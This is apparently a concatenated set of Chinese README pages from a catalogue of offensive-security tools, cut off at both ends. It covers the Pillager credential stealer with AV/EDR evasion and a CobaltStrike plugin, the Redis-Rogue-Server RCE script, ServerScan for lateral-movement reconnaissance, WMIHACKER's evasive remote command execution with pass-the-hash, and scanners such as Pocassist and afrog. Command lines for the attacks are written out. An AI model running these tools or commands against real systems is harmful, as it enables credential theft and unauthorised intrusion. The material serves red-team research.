| * Skype 51 | * Enigma 52 | * 钉钉 53 | * Line 54 | * Discord 55 | * 网易邮箱大师 56 | * Foxmail 57 | * FileZilla 58 | * 凭据提取 59 | * MobaXterm 60 | * Xmanager 61 | * RDCMan 62 | * FinalShell 63 | * Navicat 64 | * SQLyog 65 | * SecureCRT 66 | * Outlook 67 | * MailBird 68 | * WinSCP 69 | * DBeaver 70 | * CoreFTP 71 | * Snowflake 72 | * 个人信息 73 | * QQ 74 | * VSCode 75 | * 网易云音乐 76 | 77 | 后续将会陆续添加支持的软件 78 | 79 | #### System 80 | 81 | * Wifi 82 | * 截屏 83 | * 已安装应用 84 | 85 | ## 使用方法 86 | 87 | 此项目使用Github Action自动编译打包,并上传至[Release](https://github.com/qwqdanchun/Pillager/releases),其中 88 | 89 | * [Pillager.exe](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.exe) 为.Net Framework v3.5编译生成的exe 90 | * [Pillager.bin](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.bin) Donut打包的raw格式的shellcode 91 | * [cs-plugin.zip](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/cs-plugin.zip) 为适用于CobaltStrike使用的插件 92 | 93 | 使用CobaltStrike可以直接下载插件包,其他人推荐将shellcode集成至自己的加载器或工具中运行,不建议直接使用Pillager.exe 94 | 95 | 执行后会将文件打包至 `%Temp%\Pillager.zip`,需要自行前往目录下载文件或修改代码将文件上传至他处 96 | 97 | ## 优点 98 | 99 | * 体积在100kb左右,为同类工具体积的几分之一甚至几十分之一 100 | * 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集 101 | * 长期维护,有问题可以及时的反馈处理 102 | * 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征 103 | 104 | 105 | ## 项目相关 106 | 107 | 108 | ## 最近更新 109 | 110 | 111 | -------------------------------------------------------------------------------- /detail/Pocassist.md: -------------------------------------------------------------------------------- 1 | ## Pocassist 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-jweny-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/jweny/pocassist.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.5-red) 7 | ![Time](https://img.shields.io/badge/Join-20210702-green) 8 | 9 | 10 | 11 | pocassist是一个 Golang 编写的全新开源漏洞测试框架。 12 | 13 | - 简单易用 14 | - 只需要在前端编辑,即可生成poc对批量目标进行测试 15 | - 单二进制文件,无依赖,也无需安装 16 | - 性能优秀 17 | - 支持高并发,多重并发控制,通过使用 `ants`实例化协程池,复用 goroutine 18 | - 多重内存复用,尽可能小的内存占用 19 | - 规则体系 20 | - 完全兼容xray,但又不仅仅是xray。除了支持定义目录级漏洞poc,还支持服务器级漏洞、参数级漏洞、url级漏洞以及对页面内容检测,如果以上还不满足你的需求,还支持加载自定义脚本。 21 | 22 | 使用之前务必先阅读使用文档! 23 | 24 | 🏠[使用文档](https://pocassist.jweny.top/) ⬇️[下载最新版本](https://github.com/jweny/pocassist/releases) 25 | 26 | ## 快速开始 27 | 28 | ### 像数 1, 2, 3 一样容易 29 | 30 | ```bash 31 | # 启动服务 32 | ./pocassist 33 | 34 | # 浏览器访问 35 | http://127.0.0.1:1231 36 | ``` 37 | 38 | 建议使用[pocassistdb](https://github.com/jweny/pocassistdb)作为漏洞库。⬇️[下载漏洞库最新版本](https://github.com/jweny/pocassistdb/releases/),并在`config.yaml `的`sqlite`项配置路径。 39 | 40 | 有想一块维护poc的师傅也可直接向该项目提PR。 41 | 42 | ## Demo 43 | 44 | 登录页 45 | 46 | ![登录页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E7%99%BB%E5%BD%95%E9%A1%B5.jpg) 47 | 48 | 规则首页 49 | 50 | ![规则首页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E8%A7%84%E5%88%99%E9%A6%96%E9%A1%B5.jpg) 51 | 52 | 规则详情 53 | 54 | ![规则详情](https://github.com/jweny/pocassist/raw/master/docs/pic/%E8%A7%84%E5%88%99%E8%AF%A6%E6%83%85.jpg) 55 | 56 | 支持一键导入xray规则 57 | 58 | ![upload-yaml](https://github.com/jweny/pocassist/raw/master/docs/pic/yaml.gif) 59 | 60 | 单条规则靶机测试 61 | 62 | ![单条规则靶机测试](https://github.com/jweny/pocassist/raw/master/docs/pic/%E5%8D%95%E6%9D%A1%E8%A7%84%E5%88%99%E9%9D%B6%E6%9C%BA%E6%B5%8B%E8%AF%95.png) 63 | 64 | 漏洞描述首页 65 | 66 | ![漏洞描述首页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0%E9%A6%96%E9%A1%B5.jpg) 67 | 68 | 漏洞描述详情 69 | 70 | ![漏洞描述详情](https://github.com/jweny/pocassist/raw/master/docs/pic/%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0%E8%AF%A6%E6%83%85.png) 71 | 72 | 新建批量扫描任务 73 | 74 | ![新建扫描任务](https://github.com/jweny/pocassist/raw/master/docs/pic/%E6%96%B0%E5%BB%BA%E6%89%AB%E6%8F%8F%E4%BB%BB%E5%8A%A1.png) 75 | 76 | 任务状态 77 | 78 | ![任务首页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E4%BB%BB%E5%8A%A1%E9%A6%96%E9%A1%B5.png) 79 | 80 | 扫描结果 81 | 82 | ![扫描结果](https://github.com/jweny/pocassist/raw/master/docs/pic/%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.jpg) 83 | 84 | 结果首页 85 | 86 | ![结果首页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E7%BB%93%E6%9E%9C%E9%A6%96%E9%A1%B5.jpg) 87 | 88 | 组件首页 89 | 90 | ![组件首页](https://github.com/jweny/pocassist/raw/master/docs/pic/%E7%BB%84%E4%BB%B6%E9%A6%96%E9%A1%B5.jpg) 91 | 92 | ## 常见问题 93 | 94 | 1. 自定义配置。pocassist首次运行时将在当前目录生成`config.yaml`,引擎启动后实时监控配置文件变化,配置文件修改后无需重启,即热加载 95 | 2. 用户名密码错误:检查数据库配置,以及数据库auth表。建议使用[pocassistdb](https://github.com/jweny/pocassistdb)作为漏洞库 96 | 5. 支持前后端分离部署。前端源码、nginx配置示例可参考[pocassistweb](https://github.com/jweny/pocassistweb) 97 | 4. 其他使用问题请先阅读[使用文档](https://pocassist.jweny.top/) 98 | 99 | ## 免责声明 100 | 101 | 未经授权,使用pocassist攻击目标是非法的。pocassist仅用于安全测试目的。为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。 102 | 103 | 104 | ## 项目相关 105 | 106 | - 2021-11-17 发布文章[《pocassist : 全新的开源在线 poc 测试框架》](https://mp.weixin.qq.com/s/y0FrNX08yULCqJXmUI6FSg) 107 | 108 | ## 最近更新 109 | 110 | 111 | -------------------------------------------------------------------------------- /detail/PortForward.md: -------------------------------------------------------------------------------- 1 | ## PortForward 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/PortForward.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.5.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20201022-green) 8 | 9 | 10 | 11 | ## 0x00 前言 12 | `PortForward` 是使用 Golang 进行开发的端口转发工具,解决在某些场景下 `内外网无法互通`的问题。 13 | 14 | `PortForward` 的功能如下: 15 | 16 | 1. 支持 tcp/udp 协议层的端口转发 17 | 2. 支持级联 18 | 3. 支持正向/反向连接模式 19 | 4. 支持多通道 20 | 5. 支持 ipv6 21 | 22 | 本文对 `PortForward` 进行了详细的介绍。 23 | 24 | 目录: 25 | 26 | 1. 使用说明 27 | 2. 工作场景 28 | 3. 源码结构 29 | 4. 逻辑结构 30 | 5. 端口转发的实现 31 | 6. udp的knock报文 32 | 7. udp的超时设置 33 | 8. listen-listen的超时设置 34 | 9. 多通路的实现 35 | 10. issue 36 | 11. contributions 37 | 38 | ## 0x01 使用说明 39 | **1.使用** 40 | 41 | Usage: 42 | ./portforward [proto] [sock1] [sock2] 43 | Option: 44 | proto the port forward with protocol(tcp/udp) 45 | sock format: [method:address:port] 46 | method the sock mode(listen/conn) 47 | Example: 48 | tcp conn:192.168.1.1:3389 conn:192.168.1.10:23333 49 | udp listen:192.168.1.3:5353 conn:8.8.8.8:53 50 | tcp listen:[fe80::1%lo0]:8888 conn:[fe80::1%lo0]:7777 51 | 52 | version: 0.5.0(build-20201022) 53 | 54 | **2.编译** 55 | 56 | Golang 1.12及以上 57 | GO111MODULE=on 58 | 59 | git clone https://github.com/knownsec/Portforward.git 60 | ./build.sh 61 | 62 | 63 | ## 0x02 工作场景 64 | 这里列举了一些 `PortForward` 的工作场景,如下: 65 | 66 | **2.1 简单模式** 67 |
68 | 69 |
[图1.简单转发模式] 70 |
71 | 72 | **2.2 受限主机转发** 73 |
74 | 75 |
[图2.受限主机转发模式图] 76 |
77 | 78 | **2.3 级联端口转发** 79 |
80 | 81 |
[图3.级联端口转发] 82 |
83 | 84 | 85 | ## 0x03 源码结构 86 | 87 | . 88 | ├── CHANGELOG 89 | ├── Images // images resource 90 | ├── README.md 91 | ├── build.sh // compile script 92 | ├── forward.go // portforward main logic 93 | ├── go.mod 94 | ├── log.go // log module 95 | ├── main.go // main, parse arguments 96 | ├── tcp.go // tcp layer 97 | └── udp.go // udp layer 98 | 99 | 100 | ## 0x04 逻辑结构 101 | `PortForward` 支持 `TCP` , `UDP` 协议层的端口转发,代码抽象后逻辑结构框架如下: 102 |
103 | 104 |
[图4.整体框架] 105 |
106 | 107 | 108 | ## 0x05 端口转发的实现 109 | 端口转发程序作为网络传输的中间人,无非就是将两端的 socket 对象进行联通,数据就可以通过这条「链路」进行传输了。 110 | 111 | 按照这样的思路,我们从需求开始分析和抽象,可以这么认为:无论是作为 `tcp` 还是 `udp` 运行,无论是作为 `connect` 还是 `listen` 运行,最终都将获得两个 socket,其中一个连向原服务,另一个与客户端连接;最终将这两端的 socket 联通即可实现端口转发。 112 | 113 | 在 Golang 中我们采用了 `io.Copy()` 来联通两个 socket,但是 `io.Copy` 必须要求对象实现了 `io.Reader/io.Writer` 接口,`tcp` 的 socket 可以直接支持,而 `udp` 的 socket 需要我们进行封装。 114 | 115 | 116 | ## 0x06 udp的knock报文 117 | 在 `udp` 的 `connect` 模式下,我们在连接服务器成功后,立即发送了一个 `knock` 报文,如下: 118 | 119 | conn, err := net.DialTimeout("udp", ... 120 | _, err = conn.Write([]byte("\x00")) 121 | 122 | 其作用是通知远程 `udp` 服务器我们已经连上了(`udp` 创建连接后,仅在本地操作系统层进行了注册,只有当发送一个报文到对端后,远程服务器才能感知到新连接),当我们在 `udp` 的 `conn-conn` 模式下运行时,这个报文是必须的。 123 | 124 | 125 | ## 0x07 udp的超时设置 126 | 在 `udp` 的实现中,我们为所有的 `udp` 连接 socket 对象都设置了超时时间(`tcp` 中不需要),这是因为在 `udp` 中,socket 对象无法感知对端退出,如果不设置超时时间,将会一直在 `conn.Read()` 阻塞下去。 127 | 128 | 我们设置了 `udp` 超时时间为 60 秒,当 60 秒无数据传输,本次建立的虚拟通信链路将销毁,端口转发程序将重新创建新的通信链路。 129 | 130 | 131 | ## 0x08 listen-listen的超时设置 132 | 对于 `listen-listen` 模式,需要等待两端的客户端都连上端口转发程序后,才能将两个 socket 进行联通。 133 | 134 | 为此我们在此处设置了 120 秒的超时时间,也就是说当其中一端有客户端连接后,另一端在 120 秒内没有连接,我们就销毁这个未成功建立的通信链路;用户重新连接即可。 135 | 136 | >如果没有这个超时,可能某些场景遗留了某个连接,将造成后续的通信链路错位。 137 | 138 | 139 | ## 0x09 多通路的实现 140 | 多通路可以支持同时发起多个连接,这里我们以 `tcp` 作为例子来说明。为了处理这种情况,我们的处理方式是: 141 | 142 | 1. `listen-conn`: 每当 listen 服务器接收到新连接后,与远端创建新的连接,并将两个 socket 进行联通。 143 | 2. `listen-listen`: (好像没有实际场景)两端的 listen 服务器接收到新连接后,将两个 socket 进行联通。 144 | 3. `conn-conn`: 创建 sock1 的连接,当 sock1 端收到数据,创建与 sock2 的连接,将两个 socket 进行联通;随后继续创建 sock1 连接(预留)。 145 | 146 | >我们在 `udp` 中也加入了多通路的支持,和 `tcp` 基本类似,但由于 `udp` 是无连接的,我们不能像 `tcp` 直接联通两个 socket 对象。我们在 `udp listen` 服务器中维护了一个临时表,使用 `ip:port` 作为标志,以描述各个通信链路的联通情况,依据此进行流量的分发。 147 | 148 | 149 | 150 | ## 项目相关 151 | 152 | 153 | ## 最近更新 154 | 155 | 156 | -------------------------------------------------------------------------------- /detail/Redis-Rogue-Server.md: -------------------------------------------------------------------------------- 1 | ## Redis-Rogue-Server 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-Dliv3-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/Dliv3/redis-rogue-server.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20201120-green) 8 | 9 | 10 | 11 | Redis 4.x/Redis 5.x RCE利用脚本, 涉及技术点可参考 [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf). 12 | 13 | 经测试Redis 5.0.8也可以使用,没有出现ppt上写的5.0无法set/get config的情况. 14 | 15 | ## Usage 16 | 17 | 编译.so模块, 代码: . 18 | 19 | 将.so与 `redis-rogue-server.py`放置在同一目录下 20 | 21 | 项目自带了一个编译好的的exp.so文件, 可直接使用 22 | 23 | ### 主动连接模式 24 | 25 | 适用于目标Redis服务处于外网的情况 26 | - 外网Redis未授权访问 27 | - 已知外网Redis口令 28 | 29 | 启动redis rogue server,并主动连接目标redis服务发起攻击 30 | 31 | ```bash 32 | python3 redis-rogue-server.py --rhost --rport --lhost --lport 33 | ``` 34 | 35 | 参数说明: 36 | - `--rpasswd` 如果目标Redis服务开启了认证功能,可以通过该选项指定密码 37 | - `--rhost` 目标redis服务IP 38 | - `--rport` 目标redis服务端口,默认为6379 39 | - `--lhost` vps的外网IP地址 40 | - `--lport` vps监控的端口,默认为21000 41 | 42 | 攻击成功之后,你会得到一个交互式shell 43 | 44 | ### 被动连接模式 45 | 46 | 适用于目标Redis服务处于内网的情况 47 | - 通过SSRF攻击Redis 48 | - 内网Redis未授权访问/已知Redis口令, Redis需要反向连接redis rogue server 49 | 50 | 这种情况下可以使用`--server-only`选项 51 | 52 | ```bash 53 | python3 redis-rogue-server.py --server-only 54 | ``` 55 | 56 | 参数说明: 57 | - `--server-only` 仅启动redis rogue server, 接受目标redis的连接,不主动发起连接 58 | 59 | ## Copyright 60 | 61 | 本项目为[n0b0dyCN](https://github.com/n0b0dyCN)同名项目的fork, 在原项目代码基础之上修复了一些bug, 添加了一些新功能, 并针对不同漏洞利用场景做了一些优化。 62 | 63 | 因原作者删掉了原始repo, 所以直接挂到了我下面。 64 | 65 | 本项目版权归[Dliv3](https://github.com/Dliv3)和[n0b0dyCN](https://github.com/n0b0dyCN)所有。 66 | 67 | 68 | ## 项目相关 69 | 70 | 71 | ## 最近更新 72 | 73 | 74 | -------------------------------------------------------------------------------- /detail/ServerScan.md: -------------------------------------------------------------------------------- 1 | ## ServerScan 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-Adminisme-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/Adminisme/ServerScan.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.2-red) 7 | ![Time](https://img.shields.io/badge/Join-20210223-green) 8 | 9 | 10 | 11 | ```shell 12 | ███████╗███████╗██████╗ ██╗ ██╗███████╗██████╗ ███████╗ ██████╗ █████╗ ███╗ ██╗ 13 | ██╔════╝██╔════╝██╔══██╗██║ ██║██╔════╝██╔══██╗ ██╔════╝██╔════╝██╔══██╗████╗ ██║ 14 | ███████╗█████╗ ██████╔╝██║ ██║█████╗ ██████╔╝ ███████╗██║ ███████║██╔██╗ ██║ 15 | ╚════██║██╔══╝ ██╔══██╗╚██╗ ██╔╝██╔══╝ ██╔══██╗ ╚════██║██║ ██╔══██║██║╚██╗██║ 16 | ███████║███████╗██║ ██║ ╚████╔╝ ███████╗██║ ██║ ███████║╚██████╗██║ ██║██║ ╚████║ 17 | ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝ 18 | By:Trim 19 | ``` 20 | 21 | 一款使用**Golang**开发且适用于攻防演习**内网横向信息收集**的**高并发**网络扫描、服务探测工具。 22 | 23 | ## 🍭Property 24 | - 多平台支持(Windows、Mac、Linux、Cobalt Strike) 25 | - 存活IP探测(支持TCP、ICMP两种模式) 26 | - 超快的端口扫描 27 | - 服务和应用版本检测功能,内置指纹探针采用:[nmap-service-probes](https://raw.githubusercontent.com/nmap/nmap/master/nmap-service-probes) 28 | - Web服务(http、https)信息探测 29 | - ~~扫描结果兼容INFINITY攻防协同平台~~(暂不公开) 30 | 31 | ## 🎉First Game 32 | 33 | ​ 总结诸多实战经验,考虑到实战过程中会出现和存在复杂的环境、红蓝对抗过程中常用的内存加载无文件落地执行等,因此**ServerScan**设计了**轻巧版**、**专业版**、支持**Cobalt Strike跨平台beacon:[Cross C2](https://github.com/gloxec/CrossC2)的动态链接库**,**~~以及支持INFINITY攻防协同平台的专用版~~**。便于在不同的Shell环境中可以轻松自如地使用:如:Windows Cmd、Linux Console、远控Console、WebShell等,以及Cobalt Strike联动使用cna脚本文件加载,实现内网信息快速收集,为下一步横向移动铺路。 34 | 35 | **轻巧版:** 36 | 37 | 参数形式简单、扫描速度快、耗时短、文件体积小、适合在网络情况较好的条件情况下使用。 38 | 39 | **专业版:** 40 | 41 | 支持参数默认值、支持自定义扫描超时时长、支持扫描结果导出、适合在网络条件较苛刻的情况下使用。 42 | 43 | **动态链接库:** 44 | 45 | 为支持Cobalt Strike跨平台beacon,无文件落地执行,无文件执行的进程信息,基于轻巧版本进行动态链接库编译,扫描超时时长为1.5秒。 46 | 47 | ### 💻for Linux or Windows 48 | 49 | * #### 轻巧版 50 | 51 | * ***for PortScan*** 52 | 53 | **Usage:** 54 | 55 | ![Air_scan_use](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Linux/Air_scan_use.png) 56 | 57 | **Scanning:** 58 | 59 | ![Air_scan1](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Linux/Air_scan.png) 60 | 61 | * ***for Service and Version Detection*** 62 | 63 | **Usage:** 64 | 65 | ![Air_scan_probes_use](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Windows/Air_scan_probes_use.png) 66 | 67 | **Scanning:** 68 | 69 | ![Air_scan_probes](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Windows/Air_scan_probes.png) 70 | 71 | * #### 专业版 72 | 73 | * ***for PortScan*** 74 | 75 | **Usage:** 76 | 77 | ![Pro_scan_use](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Linux/Pro_scan_use.png) 78 | 79 | **Scanning:** 80 | 81 | ![Pro_scan](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Linux/Pro_scan.png) 82 | 83 | * ***for Service and Version Detection*** 84 | 85 | **Usage:** 86 | 87 | ![Pro_scan_probes_use](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Windows/Pro_scan_probes_use.png) 88 | 89 | **Scanning:** 90 | 91 | ![Pro_scan_probes](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/Windows/Pro_scan_probes.png) 92 | 93 | 94 | ### 🎮for Cobalt Strike 95 | 96 | * ***Windows*** 97 | 98 | 由于Cobalt Strike已经内置了PortScan,因此目前Windows仅支持利用cna上传对应版本的ServerScan可执行文件到服务器进行扫描。 99 | 100 | * ***for Service and Version Detection*** 101 | 102 | Interact: 103 | 104 | ![serverscan_windows](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/serverscan_windows.jpg) 105 | 106 | ![serverscan2_windows](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/serverscan2_windows.jpg) 107 | 108 | 109 | * ***Cobalt Strike跨平台beacon*** 110 | 111 | ​ ServerScan的优势在于跨平台,在Hook师傅的帮(jiān)助(dū)下目前已经基本适配了[Cross C2](https://github.com/gloxec/CrossC2)的Linux、Mac OS两大平台,为了提高隐匿性减少文件特征,目前支持内存加载可执行程序和动态链接库调用,您只需在安装了Cross C2的Cobalt Strike中导入对应的.cna脚本,即可实现ServerScan与Cobalt Strike跨平台beacon联动,具体使用参考[Usage](#usage)。 112 | 113 | * ***for PortScan*** 114 | 115 | Interact: 116 | 117 | ![portscan_console](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/portscan_console.jpg) 118 | 119 | Targets结果集自动导入: 120 | 121 | ![portscan_targets](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/portscan_targets.jpg) 122 | 123 | services结果集自动导入: 124 | 125 | ![portscan_services](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/portscan_services.jpg) 126 | 127 | * ***for Service and Version Detection*** 128 | 129 | Interact: 130 | 131 | ![serverscan_console](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/serverscan_console.png) 132 | 133 | Targets结果集自动导入: 134 | 135 | ![serverscan_targets](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/serverscan_targets.jpg) 136 | 137 | services结果集自动导入: 138 | 139 | ![serverscan_services](https://github.com/Adminisme/ServerScan/raw/master/img/serverscan/CobaltStrike/serverscan_services.jpg) 140 | 141 | 142 | ## 项目相关 143 | 144 | 145 | ## 最近更新 146 | 147 | 148 | -------------------------------------------------------------------------------- /detail/WMIHACKER.md: -------------------------------------------------------------------------------- 1 | ## WMIHACKER 2 | 3 | ![Language](https://img.shields.io/badge/Language-VBScript-blue) 4 | ![Author](https://img.shields.io/badge/Author-rootclay-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20221117-green) 8 | 9 | 10 | > 免责声明:本项目涉及的技术仅供安全学习与研究防御用途,禁止非法使用! 11 | 12 | 免杀横向移动命令执行测试工具(无需445端口) 13 | 14 | 介绍:免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口) 15 | 16 | 主要功能:1、命令执行;2、文件上传;3、文件下载;4、PTH使用 17 | 18 | ## 使用 19 | 合并[Issue 1](https://github.com/360-Linton-Lab/WMIHACKER/issues/1)里PTH的使用方法: 20 | 21 | ```vbscript 22 | 第54-58行代码: 23 | 24 | if user = "-" And pass = "-" Then 25 | set objWMIService = objLocator.connectserver(host,"root/cimv2") 26 | Set SubobjSWbemServices = objLocator.ConnectServer(host, "root\subscription") 27 | Set regWMIService = objLocator.ConnectServer(host, "root\default") 28 | 29 | 用户名和密码填“-”,结合mimikatz的PTH就可以进行WMI的PTH了。 30 | ``` 31 | 32 | ``` 33 | C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs 34 | 35 | __ ____ __ _____ _ _ _____ _ ________ _____ 36 | \ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \ 37 | \ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) | 38 | \ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ / 39 | \ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \ 40 | \/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\ 41 | v0.6beta By. Xiangshan@360RedTeam 42 | Usage: 43 | WMIHACKER.vbs /cmd host user pass command GETRES? 44 | 45 | WMIHACKER.vbs /shell host user pass 46 | 47 | WMIHACKER.vbs /upload host user pass localpath remotepath 48 | 49 | WMIHACKER.vbs /download host user pass localpath remotepath 50 | 51 | /cmd single command mode 52 | host hostname or IP address 53 | GETRES? Res Need Or Not, Use 1 Or 0 54 | command the command to run on remote host 55 | ``` 56 | 57 | 有命令回显执行方式 58 | 59 | `> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1` 60 | 61 | 无命令回显 62 | 63 | `> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0` 64 | 65 | 模拟shell模式 66 | 67 | `> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!" ` 68 | 69 | 文件上传-复制本机calc.exe到远程主机c:\calc.exe 70 | 71 | `> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"` 72 | 73 | 文件下载-下载远程主机calc.exe到本地c:\calc.exe 74 | 75 | `> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe" ` 76 | 77 | 78 | 79 | ## 项目相关 80 | 81 | 82 | ## 最近更新 83 | 84 | 85 | -------------------------------------------------------------------------------- /detail/ZoomEye-Tools.md: -------------------------------------------------------------------------------- 1 | ## Zoomeye-Tools 2 | 3 | ![Language](https://img.shields.io/badge/Language-JS-blue) 4 | ![Author](https://img.shields.io/badge/Author-Knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/Zoomeye-Tools.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.3.2-red) 7 | ![Time](https://img.shields.io/badge/Join-20200821-green) 8 | 9 | 10 | 11 | ZoomEye Tools provides a variety of functions to assist the use of Zoomeye, including a proview host and many other functions 12 | 13 | ZoomEye Tools provides three major functions: 14 | 1、Simple proview function. 15 | You can get various information about the ip of the current webpage you visit through the browser plug-in. This is a simple and convenient way. If you want to view more information, you can refer to function 2. 16 | 17 | 2、Detailed information function 18 | You can click to view details and search for details of the current page URL in ZoomEye 19 | 20 | 3、ZoomEye search function 21 | You can quickly search the specified content in ZoomEye by selecting a piece of content, then clicking the right mouse button, and choosing to use ZoomEye to search. 22 | 23 | ZoomEye Tools 提供三个主要功能: 24 | 1、简单的proview功能。 25 | 你可以通过浏览器插件获得你访问的当前网页所在ip的各种信息,这是一个简单便捷的方式,如果你想查看更多信息,可以参考功能2。 26 | 27 | 2、详细信息功能 28 | 你可以通过点击查看详情,在ZoomEye中搜索当前页面URL的详细信息 29 | 30 | 3、ZoomEye搜索功能 31 | 你可以通过选中一段内容,之后点击鼠标右键,选择使用ZoomEye搜索,即可快速在ZoomEye中查询指定内容。 32 | 33 | 34 | Chrome网上应用商店: 35 | 36 | 37 | 38 | 39 | 40 | ## 项目相关 41 | 42 | 43 | ## 最近更新 44 | 45 | #### [v0.3.2] - 2021-12-01 46 | 47 | **Add** 48 | - 右键查询功能,目前支持ZoomEye和VirusTotal 49 | 50 | **Changed** 51 | - ZoomEye preview 优化显示界面,取消登录限制 52 | 53 | **Removed** 54 | - ZoomEye minitools 55 | 56 | 57 | -------------------------------------------------------------------------------- /detail/afrog.md: -------------------------------------------------------------------------------- 1 | ## afrog 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-zan8in-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/zan8in/afrog.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V3.1.7-red) 7 | ![Time](https://img.shields.io/badge/Join-20220615-green) 8 | 9 | 10 | ## What is afrog 11 | 12 | afrog is a high-performance vulnerability scanner that is fast and stable. It supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution. With afrog, network security professionals can quickly validate and remediate vulnerabilities, which helps to enhance their security defense capabilities. 13 | 14 | ## Features 15 | 16 | * [x] Open source 17 | * [x] Fast, stable, with low false positives 18 | * [x] Detailed HTML vulnerability reports 19 | * [x] Customizable and stably updatable PoCs 20 | * [x] Active community exchange group 21 | 22 | ## Installation 23 | 24 | ### Prerequisites 25 | 26 | - [Go](https://go.dev/) version 1.19 or higher. 27 | 28 | you can install it with: 29 | 30 | **Binary** 31 | ```sh 32 | $ https://github.com/zan8in/afrog/releases 33 | ``` 34 | 35 | **Github** 36 | ```sh 37 | $ git clone https://github.com/zan8in/afrog.git 38 | $ cd afrog 39 | $ go build cmd/afrog/main.go 40 | $ ./afrog -h 41 | ``` 42 | 43 | **Go** 44 | ```sh 45 | $ go install -v https://github.com/zan8in/afrog/cmd/afrog@latest 46 | ``` 47 | 48 | ## Running afrog 49 | 50 | By default, afrog scans all built-in PoCs, and if it finds any vulnerabilities, it automatically creates an HTML report with the date of the scan as the filename. 51 | 52 | ```sh 53 | afrog -t https://example.com 54 | ``` 55 | 56 | **Warning occurs when running afrog** 57 | 58 | If you see an error message saying: 59 | ``` 60 | [ERR] ceye reverse service not set: /home/afrog/.config/afrog/afrog-config.yaml 61 | ``` 62 | it means you need to modify the [configuration file](#configuration-file). 63 | 64 | To execute a 